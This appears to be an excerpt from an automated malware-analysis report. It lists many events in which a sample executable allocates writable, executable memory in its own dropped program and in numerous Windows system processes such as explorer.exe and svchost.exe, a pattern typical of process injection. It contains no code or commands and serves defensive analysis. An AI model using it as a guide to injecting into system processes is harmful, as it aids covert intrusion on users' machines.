        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 810000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1040000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 750000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1020000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1430000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 840000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 900000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 1220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 120000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 590000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 710000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\ctfmon.exe base: A70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\explorer.exe base: 3110000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\svchost.exe base: D60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 130000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AD0000 protect: page execute and read and write
